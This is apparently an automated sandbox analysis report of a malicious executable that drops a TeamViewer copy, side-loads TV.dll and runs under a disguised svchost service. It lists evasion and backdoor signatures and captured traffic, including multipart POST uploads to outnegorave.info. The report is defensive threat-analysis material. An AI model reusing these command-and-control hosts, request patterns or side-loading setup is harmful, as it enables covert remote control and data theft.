Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 77Etc0bR2v.exe

Overview

General Information

Sample Name:77Etc0bR2v.exe
Analysis ID:483795
MD5:e71e3b995477081569ed357e4d403666
SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags:exeHartexLLCsignedsoldewornek
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:17
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 6400 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 77Etc0bR2v.exe (PID: 6880 cmdline: 'C:\Users\user\Desktop\77Etc0bR2v.exe' MD5: E71E3B995477081569ED357E4D403666)
    • TeamViewer.exe (PID: 6952 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 5424 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5568 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 1972 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 5724 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6052 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 4928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 6704 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 77Etc0bR2v.exeVirustotal: Detection: 37%Perma Link
Source: 77Etc0bR2v.exeReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllReversingLabs: Detection: 26%
Source: 1.2.77Etc0bR2v.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_006F605B CryptReleaseContext,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeEXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: msimg32.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to behavior

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: 77Etc0bR2v.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\Desktop\77Etc0bR2v.exeEXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to behavior
DLL planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: msimg32.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to behavior
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: 77Etc0bR2v.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 87812Content-Type: multipart/form-data; boundary=--------2771230636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 90555Content-Type: multipart/form-data; boundary=--------2341619378User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86397Content-Type: multipart/form-data; boundary=--------1750076427User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: svchost.exe, 0000000E.00000003.478811722.000001C495982000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
